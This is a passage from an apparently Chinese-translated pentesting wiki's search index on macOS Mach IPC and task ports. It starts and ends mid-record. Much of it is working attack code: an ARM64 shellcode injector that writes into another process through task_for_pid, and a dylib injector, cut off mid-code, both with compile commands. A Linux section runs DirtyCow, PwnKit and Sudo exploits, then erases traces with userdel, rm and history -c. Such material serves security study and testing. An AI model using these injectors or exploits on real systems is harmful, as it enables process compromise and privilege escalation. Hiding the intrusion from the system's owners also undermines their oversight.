0x00028da7 (418) runningboardd\\n0x00000a6b 0x1d4a18cd send -------- --- 2 -> 16 0 0x0000000000000000 0x00006a03 (92247) Dock\\n0x00000b03 0x175a5d4d send -------- --- 2 -> 16 0 0x0000000000000000 0x00001803 (310) logd\\n[...]\\n0x000016a7 0x192c743d recv,send --TGSI-- 0 --- 1 1 Y 16 0 0x0000000000000000\\n+ send -------- --- 1 <- 0x00002d03 (81948) seserviced\\n+ send -------- --- 1 <- 0x00002603 (74295) passd\\n[...] 
名称 是分配给端口的默认名称(检查它在前3个字节中的 增加 情况)。 ipc-object 是端口的 混淆 唯一 标识符 。 还要注意,只有**send 权限的端口是 识别其所有者 的(端口名称 + pid)。 还要注意使用 + 来表示 连接到同一端口的其他任务**。 还可以使用 procexp 查看 注册的服务名称 (由于需要com.apple.system-task-port,因此禁用SIP): procexp 1 ports 您可以通过从 http://newosxbook.com/tools/binpack64-256.tar.gz 下载此工具来安装它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 枚举端口","id":"2404","title":"枚举端口"},"2405":{"body":"注意 receiver 如何 分配 端口,为名称 org.darlinghq.example 创建 发送权限 并将其 注册 到 引导服务器 ,而 sender 则向引导服务器请求该名称的 发送权限 并使用它来 发送消息 。 receiver.c\\nsender.c c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html\\n// gcc receiver.c -o receiver #include \\n#include \\n#include int main() { // Create a new port.\\nmach_port_t port;\\nkern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_port_allocate() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"mach_port_allocate() created port right name %d\\\\n\\", port); // Give us a send right to this port, in addition to the receive right.\\nkr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_port_insert_right() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"mach_port_insert_right() inserted a send right\\\\n\\"); // Send the send right to the bootstrap server, so that it can be looked up by other processes.\\nkr = bootstrap_register(bootstrap_port, \\"org.darlinghq.example\\", port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_register() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"bootstrap_register()\'ed our port\\\\n\\"); // Wait for a message.\\nstruct {\\nmach_msg_header_t header;\\nchar some_text[10];\\nint some_number;\\nmach_msg_trailer_t trailer;\\n} message; kr = mach_msg(\\n&message.header, // Same as (mach_msg_header_t *) &message.\\nMACH_RCV_MSG, // Options. 
We\'re receiving a message.\\n0, // Size of the message being sent, if sending.\\nsizeof(message), // Size of the buffer for receiving.\\nport, // The port to receive a message on.\\nMACH_MSG_TIMEOUT_NONE,\\nMACH_PORT_NULL // Port for the kernel to send notifications about this message to.\\n);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_msg() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Got a message\\\\n\\"); message.some_text[9] = 0;\\nprintf(\\"Text: %s, number: %d\\\\n\\", message.some_text, message.some_number);\\n} c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html\\n// gcc sender.c -o sender #include \\n#include \\n#include int main() { // Lookup the receiver port using the bootstrap server.\\nmach_port_t port;\\nkern_return_t kr = bootstrap_look_up(bootstrap_port, \\"org.darlinghq.example\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_look_up() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"bootstrap_look_up() returned port right name %d\\\\n\\", port); // Construct our message.\\nstruct {\\nmach_msg_header_t header;\\nchar some_text[10];\\nint some_number;\\n} message; message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);\\nmessage.header.msgh_remote_port = port;\\nmessage.header.msgh_local_port = MACH_PORT_NULL; strncpy(message.some_text, \\"Hello\\", sizeof(message.some_text));\\nmessage.some_number = 35; // Send the message.\\nkr = mach_msg(\\n&message.header, // Same as (mach_msg_header_t *) &message.\\nMACH_SEND_MSG, // Options. 
We\'re sending a message.\\nsizeof(message), // Size of the message being sent.\\n0, // Size of the buffer for receiving.\\nMACH_PORT_NULL, // A port to receive a message on, if receiving.\\nMACH_MSG_TIMEOUT_NONE,\\nMACH_PORT_NULL // Port for the kernel to send notifications about this message to.\\n);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_msg() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Sent a message\\\\n\\");\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 代码示例","id":"2405","title":"代码示例"},"2406":{"body":"有一些特殊端口允许在任务拥有 SEND 权限的情况下 执行某些敏感操作或访问某些敏感数据 。这使得这些端口从攻击者的角度来看非常有趣,不仅因为其能力,还因为可以 在任务之间共享SEND权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 特权端口","id":"2406","title":"特权端口"},"2407":{"body":"这些端口由一个数字表示。 SEND 权限可以通过调用 host_get_special_port 获得,而 RECEIVE 权限则通过调用 host_set_special_port 获得。然而,这两个调用都需要 host_priv 端口,只有root可以访问。此外,过去root能够调用 host_set_special_port 并劫持任意端口,例如通过劫持 HOST_KEXTD_PORT 来绕过代码签名(SIP现在防止了这种情况)。 这些端口分为两组: 前7个端口由内核拥有 ,分别是 1 HOST_PORT,2 HOST_PRIV_PORT,3 HOST_IO_MASTER_PORT,7 是 HOST_MAX_SPECIAL_KERNEL_PORT。 从数字 8 开始的端口是 由系统守护进程拥有 ,可以在 host_special_ports.h 中找到声明。 主机端口 :如果一个进程对这个端口拥有 SEND 权限,它可以通过调用其例程获取 系统 的信息,例如: host_processor_info: 获取处理器信息 host_info: 获取主机信息 host_virtual_physical_table_info: 虚拟/物理页表(需要 MACH_VMDEBUG) host_statistics: 获取主机统计信息 mach_memory_info: 获取内核内存布局 主机特权端口 :一个对这个端口拥有 SEND 权限的进程可以执行 特权操作 ,例如显示启动数据或尝试加载内核扩展。 进程需要是root 才能获得此权限。 此外,为了调用 kext_request API,需要拥有其他权限 com.apple.private.kext* ,这些权限仅授予Apple二进制文件。 可以调用的其他例程包括: host_get_boot_info: 获取 machine_boot_info() host_priv_statistics: 获取特权统计信息 vm_allocate_cpm: 分配连续物理内存 host_processors: 发送权限到主机处理器 mach_vm_wire: 使内存常驻 由于 root 可以访问此权限,它可以调用 host_set_[special/exception]_port[s] 来 劫持主机特殊或异常端口 。 可以通过运行以下命令 查看所有主机特殊端口 : bash procexp all ports | grep \\"HSP\\"","breadcrumbs":"macOS Security & Privilege Escalation » 
macOS Process Abuse » macOS IPC - Inter Process Communication » 主机特殊端口","id":"2407","title":"主机特殊端口"},"2408":{"body":"这些端口是为知名服务保留的。可以通过调用 task_[get/set]_special_port 来获取/设置它们。它们可以在 task_special_ports.h 中找到: c typedef\\tint\\ttask_special_port_t; #define TASK_KERNEL_PORT\\t1\\t/* Represents task to the outside\\nworld.*/\\n#define TASK_HOST_PORT 2\\t/* The host (priv) port for task. */\\n#define TASK_BOOTSTRAP_PORT\\t4\\t/* Bootstrap environment for task. */\\n#define TASK_WIRED_LEDGER_PORT\\t5\\t/* Wired resource ledger for task. */\\n#define TASK_PAGED_LEDGER_PORT\\t6\\t/* Paged resource ledger for task. */ 从 这里 : TASK_KERNEL_PORT [task-self send right]:用于控制此任务的端口。用于发送影响任务的消息。这是由**mach_task_self(见下文的任务端口)**返回的端口。 TASK_BOOTSTRAP_PORT [bootstrap send right]:任务的引导端口。用于发送请求返回其他系统服务端口的消息。 TASK_HOST_NAME_PORT [host-self send right]:用于请求包含主机信息的端口。这是由 mach_host_self 返回的端口。 TASK_WIRED_LEDGER_PORT [ledger send right]:命名此任务从中提取其有线内核内存的源的端口。 TASK_PAGED_LEDGER_PORT [ledger send right]:命名此任务从中提取其默认内存管理内存的源的端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务特殊端口","id":"2408","title":"任务特殊端口"},"2409":{"body":"最初,Mach没有“进程”,它有“任务”,被认为更像是线程的容器。当Mach与BSD合并时, 每个任务与一个BSD进程相关联 。因此,每个BSD进程都有其作为进程所需的详细信息,每个Mach任务也有其内部工作(除了不存在的pid 0,即kernel_task)。 与此相关的有两个非常有趣的函数: task_for_pid(target_task_port, pid, &task_port_of_pid):获取与指定的pid相关的任务的任务端口的SEND权限,并将其授予指定的target_task_port(通常是使用mach_task_self()的调用任务,但也可以是不同任务上的SEND端口。) pid_for_task(task, &pid):给定一个任务的SEND权限,查找该任务相关的PID。 为了在任务内执行操作,任务需要对自己调用mach_task_self()的SEND权限(使用task_self_trap(28))。有了这个权限,任务可以执行多个操作,例如: task_threads:获取任务线程的所有任务端口的SEND权限 task_info:获取任务信息 task_suspend/resume:挂起或恢复任务 task_[get/set]_special_port thread_create:创建线程 task_[get/set]_state:控制任务状态 更多内容可以在 mach/task.h 中找到 caution 请注意,拥有对 不同任务 的任务端口的SEND权限,可以对不同任务执行此类操作。 此外,task_port也是**vm_map 端口,允许使用vm_read()和vm_write()等函数 读取和操作 任务内的内存。这基本上意味着,拥有对不同任务的task_port的SEND权限的任务将能够 注入代码到该任务中**。 请记住,因为 内核也是一个任务 
,如果有人设法获得对**kernel_task 的 SEND权限**,它将能够使内核执行任何操作(越狱)。 调用mach_task_self()以 获取此端口的名称 ,用于调用任务。此端口仅在**exec() 中 继承**;使用fork()创建的新任务会获得一个新的任务端口(作为特例,任务在suid二进制文件的exec()后也会获得一个新的任务端口)。生成任务并获取其端口的唯一方法是执行 \\"port swap dance\\" 同时进行fork()。 访问端口的限制如下(来自二进制文件AppleMobileFileIntegrity的macos_task_policy): 如果应用程序具有**com.apple.security.get-task-allow权限**,则来自 同一用户的进程可以访问任务端口 (通常由Xcode为调试添加)。 公证 过程不允许其用于生产版本。 具有**com.apple.system-task-ports 权限的应用程序可以获取 任何 进程的任务端口,除了内核。在旧版本中称为 task_for_pid-allow**。这仅授予Apple应用程序。 Root可以访问未使用 硬化 运行时编译的应用程序的任务端口(且不是来自Apple的)。 任务名称端口: 一个未特权版本的_task port_。它引用任务,但不允许控制它。通过它似乎唯一可用的功能是task_info()。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务端口","id":"2409","title":"任务端口"},"241":{"body":"bash # DirtyCow – CVE-2016-5195\\ngcc -pthread dirty.c -o dirty && ./dirty /etc/passwd # PwnKit – CVE-2021-4034\\npython3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156\\npython3 exploit_userspec.py 清理提示: bash userdel firefart 2>/dev/null\\nrm -f /tmp/sh ; history -c","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 7. 在遗留 NE 上的权限提升","id":"241","title":"7. 在遗留 NE 上的权限提升"},"2410":{"body":"线程也有相关的端口,可以从调用**task_threads**的任务和使用processor_set_threads的处理器中看到。对线程端口的SEND权限允许使用来自thread_act子系统的函数,例如: thread_terminate thread_[get/set]_state act_[get/set]_state thread_[suspend/resume] thread_info ... 
任何线程都可以通过调用**mach_thread_self**获取此端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 线程端口","id":"2410","title":"线程端口"},"2411":{"body":"您可以从以下位置获取Shellcode: Introduction to ARM64v8 mysleep.m\\nentitlements.plist objectivec // clang -framework Foundation mysleep.m -o mysleep\\n// codesign --entitlements entitlements.plist -s - mysleep #import double performMathOperations() {\\ndouble result = 0;\\nfor (int i = 0; i < 10000; i++) {\\nresult += sqrt(i) * tan(i) - cos(i);\\n}\\nreturn result;\\n} int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nNSLog(@\\"Process ID: %d\\", [[NSProcessInfo processInfo]\\nprocessIdentifier]);\\nwhile (true) {\\n[NSThread sleepForTimeInterval:5]; performMathOperations(); // Silent action [NSThread sleepForTimeInterval:5];\\n}\\n}\\nreturn 0;\\n} xml \\n\\n\\ncom.apple.security.get-task-allow\\n\\n\\n 编译 之前的程序并添加 权限 以便能够以相同用户注入代码(如果不这样做,您将需要使用 sudo )。 sc_injector.m\\nobjectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector\\n// Based on https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a?permalink_comment_id=2981669\\n// and on https://newosxbook.com/src.jl?tree=listings&file=inject.c #import \\n#import \\n#include \\n#include #ifdef __arm64__ kern_return_t mach_vm_allocate\\n(\\nvm_map_t target,\\nmach_vm_address_t *address,\\nmach_vm_size_t size,\\nint flags\\n); kern_return_t mach_vm_write\\n(\\nvm_map_t target_task,\\nmach_vm_address_t address,\\nvm_offset_t data,\\nmach_msg_type_number_t dataCnt\\n); #else\\n#include \\n#endif #define STACK_SIZE 65536\\n#define CODE_SIZE 128 // ARM64 shellcode that executes touch /tmp/lalala\\nchar injectedCode[] = 
\\"\\\\xff\\\\x03\\\\x01\\\\xd1\\\\xe1\\\\x03\\\\x00\\\\x91\\\\x60\\\\x01\\\\x00\\\\x10\\\\x20\\\\x00\\\\x00\\\\xf9\\\\x60\\\\x01\\\\x00\\\\x10\\\\x20\\\\x04\\\\x00\\\\xf9\\\\x40\\\\x01\\\\x00\\\\x10\\\\x20\\\\x08\\\\x00\\\\xf9\\\\x3f\\\\x0c\\\\x00\\\\xf9\\\\x80\\\\x00\\\\x00\\\\x10\\\\xe2\\\\x03\\\\x1f\\\\xaa\\\\x70\\\\x07\\\\x80\\\\xd2\\\\x01\\\\x00\\\\x00\\\\xd4\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x2d\\\\x63\\\\x00\\\\x00\\\\x74\\\\x6f\\\\x75\\\\x63\\\\x68\\\\x20\\\\x2f\\\\x74\\\\x6d\\\\x70\\\\x2f\\\\x6c\\\\x61\\\\x6c\\\\x61\\\\x6c\\\\x61\\\\x00\\"; int inject(pid_t pid){ task_t remoteTask; // Get access to the task port of the process we want to inject into\\nkern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);\\nif (kr != KERN_SUCCESS) {\\nfprintf (stderr, \\"Unable to call task_for_pid on pid %d: %d. Cannot continue!\\\\n\\",pid, kr);\\nreturn (-1);\\n}\\nelse{\\nprintf(\\"Gathered privileges over the task port of process: %d\\\\n\\", pid);\\n} // Allocate memory for the stack\\nmach_vm_address_t remoteStack64 = (vm_address_t) NULL;\\nmach_vm_address_t remoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote stack in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n}\\nelse\\n{ fprintf (stderr, \\"Allocated remote stack @0x%llx\\\\n\\", remoteStack64);\\n} // Allocate memory for the code\\nremoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote code in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n} // Write the shellcode to the allocated memory\\n// Use the real array size: the shellcode above is ~83 bytes, so a hard-coded\\n// 0xa9 would read past the end of injectedCode (and exceed CODE_SIZE).\\nkr = mach_vm_write(remoteTask, // Task port\\nremoteCode64, // Virtual Address (Destination)\\n(vm_address_t) injectedCode, // Source\\nsizeof(injectedCode)); // 
Length of the source if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to write remote thread memory: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-3);\\n} // Set the permissions on the allocated code memory\\nkr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s code: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Set the permissions on the allocated stack memory\\nkr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s stack: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Create thread to run shellcode\\nstruct arm_unified_thread_state remoteThreadState64;\\nthread_act_t remoteThread; memset(&remoteThreadState64, \'\\\\0\', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack\\n//remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;\\nremoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;\\nremoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64;\\nremoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf (\\"Remote Stack 64 0x%llx, Remote code is %p\\\\n\\", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,\\n(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) {\\nfprintf(stderr,\\"Unable to create remote thread: error %s\\", mach_error_string (kr));\\nreturn (-3);\\n} return (0);\\n} pid_t pidForProcessName(NSString *processName) {\\nNSArray *arguments = @[@\\"pgrep\\", processName];\\nNSTask *task = [[NSTask alloc] init];\\n[task setLaunchPath:@\\"/usr/bin/env\\"];\\n[task setArguments:arguments]; 
NSPipe *pipe = [NSPipe pipe];\\n[task setStandardOutput:pipe]; NSFileHandle *file = [pipe fileHandleForReading]; [task launch]; NSData *data = [file readDataToEndOfFile];\\nNSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; return (pid_t)[string integerValue];\\n} BOOL isStringNumeric(NSString *str) {\\nNSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet];\\nNSRange r = [str rangeOfCharacterFromSet: nonNumbers];\\nreturn r.location == NSNotFound;\\n} int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nif (argc < 2) {\\nNSLog(@\\"Usage: %s \\", argv[0]);\\nreturn 1;\\n} NSString *arg = [NSString stringWithUTF8String:argv[1]];\\npid_t pid; if (isStringNumeric(arg)) {\\npid = [arg intValue];\\n} else {\\npid = pidForProcessName(arg);\\nif (pid == 0) {\\nNSLog(@\\"Error: Process named \'%@\' not found.\\", arg);\\nreturn 1;\\n}\\nelse{\\nprintf(\\"Found PID of process \'%s\': %d\\\\n\\", [arg UTF8String], pid);\\n}\\n} inject(pid);\\n} return 0;\\n} bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject\\n./inject tip 要使其在 iOS 上工作,您需要权限 dynamic-codesigning 以便能够创建可写的内存可执行文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 通过任务端口在线程中注入Shellcode","id":"2411","title":"通过任务端口在线程中注入Shellcode"},"2412":{"body":"在 macOS 中, 线程 可以通过 Mach 或使用 posix pthread api 进行操作。我们在之前的注入中生成的线程是使用 Mach api 生成的,因此 它不符合 posix 标准 。 能够 注入一个简单的 shellcode 来执行命令是因为它 不需要与 posix 兼容的 api,只需与 Mach 兼容。 更复杂的注入 将需要 线程 也 符合 posix 标准 。 因此,为了 改进线程 ,它应该调用 pthread_create_from_mach_thread ,这将 创建一个有效的 pthread 。然后,这个新的 pthread 可以 调用 dlopen 来 从系统加载一个 dylib ,因此不必编写新的 shellcode 来执行不同的操作,而是可以加载自定义库。 您可以在以下位置找到 示例 dylibs (例如,生成日志的那个,然后您可以监听它): macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES dylib_injector.m\\nobjectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector\\n// Based on 
http://newosxbook.com/src.jl?tree=listings&file=inject.c\\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include #include \\n#include #ifdef __arm64__\\n//#include \\"mach/arm/thread_status.h\\" // Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported\\n// And I say, bullshit.\\nkern_return_t mach_vm_allocate\\n(\\nvm_map_t target,\\nmach_vm_address_t *address,\\nmach_vm_size_t size,\\nint flags\\n); kern_return_t mach_vm_write\\n(\\nvm_map_t target_task,\\nmach_vm_address_t address,\\nvm_offset_t data,\\nmach_msg_type_number_t dataCnt\\n); #else\\n#include \\n#endif #define STACK_SIZE 65536\\n#define CODE_SIZE 128 char injectedCode[] = // \\"\\\\x00\\\\x00\\\\x20\\\\xd4\\" // BRK X0 ; // useful if you need a break :) // Call pthread_set_self \\"\\\\xff\\\\x83\\\\x00\\\\xd1\\" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables\\n\\"\\\\xFD\\\\x7B\\\\x01\\\\xA9\\" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack\\n\\"\\\\xFD\\\\x43\\\\x00\\\\x91\\" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer\\n\\"\\\\xff\\\\x43\\\\x00\\\\xd1\\" // SUB SP, SP, #0x10 ; Space for the\\n\\"\\\\xE0\\\\x03\\\\x00\\\\x91\\" // MOV X0, SP ; (arg0)Store in the stack the thread struct\\n\\"\\\\x01\\\\x00\\\\x80\\\\xd2\\" // MOVZ X1, 0 ; X1 (arg1) = 0;\\n\\"\\\\xA2\\\\x00\\\\x00\\\\x10\\" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start\\n\\"\\\\x03\\\\x00\\\\x80\\\\xd2\\" // MOVZ X3, 0 ; X3 (arg3) = 0;\\n\\"\\\\x68\\\\x01\\\\x00\\\\x58\\" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread)\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; call pthread_create_from_mach_thread\\n\\"\\\\x00\\\\x00\\\\x00\\\\x14\\" // loop: b loop ; loop forever // Call dlopen with the path to the library\\n\\"\\\\xC0\\\\x01\\\\x00\\\\x10\\" // ADR X0, #56 ; X0 => 
\\"LIBLIBLIB...\\";\\n\\"\\\\x68\\\\x01\\\\x00\\\\x58\\" // LDR X8, #44 ; load DLOPEN\\n\\"\\\\x01\\\\x00\\\\x80\\\\xd2\\" // MOVZ X1, 0 ; X1 = 0;\\n\\"\\\\x29\\\\x01\\\\x00\\\\x91\\" // ADD x9, x9, 0 - I left this as a nop\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; do dlopen() // Call pthread_exit\\n\\"\\\\xA8\\\\x00\\\\x00\\\\x58\\" // LDR X8, #20 ; load PTHREADEXT\\n\\"\\\\x00\\\\x00\\\\x80\\\\xd2\\" // MOVZ X0, 0 ; X1 = 0;\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; do pthread_exit \\"PTHRDCRT\\" // <-\\n\\"PTHRDEXT\\" // <-\\n\\"DLOPEN__\\" // <-\\n\\"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" ; int inject(pid_t pid, const char *lib) { task_t remoteTask;\\nstruct stat buf; // Check if the library exists\\nint rc = stat (lib, &buf); if (rc != 0)\\n{\\nfprintf (stderr, \\"Unable to open library file %s (%s) - Cannot inject\\\\n\\", lib,strerror (errno));\\n//return (-9);\\n} // Get access to the task port of the process we want to inject into\\nkern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);\\nif (kr != KERN_SUCCESS) {\\nfprintf (stderr, \\"Unable to call 
task_for_pid on pid %d: %d. Cannot continue!\\\\n\\",pid, kr);\\nreturn (-1);\\n}\\nelse{\\nprintf(\\"Gathered privileges over the task port of process: %d\\\\n\\", pid);\\n} // Allocate memory for the stack\\nmach_vm_address_t remoteStack64 = (vm_address_t) NULL;\\nmach_vm_address_t remoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote stack in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n}\\nelse\\n{ fprintf (stderr, \\"Allocated remote stack @0x%llx\\\\n\\", remoteStack64);\\n} // Allocate memory for the code\\nremoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote code in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n} // Patch shellcode int i = 0;\\nchar *possiblePatchLocation = (injectedCode );\\nfor (i = 0 ; i < 0x100; i++)\\n{ // Patching is crude, but works.\\n//\\nextern void *_pthread_set_self;\\npossiblePatchLocation++; uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, \\"pthread_create_from_mach_thread\\"); //(uint64_t) pthread_create_from_mach_thread;\\nuint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, \\"pthread_exit\\"); //(uint64_t) pthread_exit;\\nuint64_t addrOfDlopen = (uint64_t) dlopen; if (memcmp (possiblePatchLocation, \\"PTHRDEXT\\", 8) == 0)\\n{\\nmemcpy(possiblePatchLocation, &addrOfPthreadExit,8);\\nprintf (\\"Pthread exit @%llx, %llx\\\\n\\", addrOfPthreadExit, pthread_exit);\\n} if (memcmp (possiblePatchLocation, \\"PTHRDCRT\\", 8) == 0)\\n{\\nmemcpy(possiblePatchLocation, &addrOfPthreadCreate,8);\\nprintf (\\"Pthread create from mach thread @%llx\\\\n\\", addrOfPthreadCreate);\\n} if (memcmp(possiblePatchLocation, \\"DLOPEN__\\", 6) == 0)\\n{\\nprintf (\\"DLOpen @%llx\\\\n\\", 
addrOfDlopen);\\nmemcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t));\\n} if (memcmp(possiblePatchLocation, \\"LIBLIBLIB\\", 9) == 0)\\n{\\nstrcpy(possiblePatchLocation, lib );\\n}\\n} // Write the shellcode to the allocated memory\\nkr = mach_vm_write(remoteTask, // Task port\\nremoteCode64, // Virtual Address (Destination)\\n(vm_address_t) injectedCode, // Source\\n0xa9); // Length of the source if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to write remote thread memory: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-3);\\n} // Set the permissions on the allocated code memory\\nkr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s code: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Set the permissions on the allocated stack memory\\nkr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s stack: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Create thread to run shellcode\\nstruct arm_unified_thread_state remoteThreadState64;\\nthread_act_t remoteThread; memset(&remoteThreadState64, \'\\\\0\', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack\\n//remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;\\nremoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;\\nremoteThreadState64.ts_64.__pc = 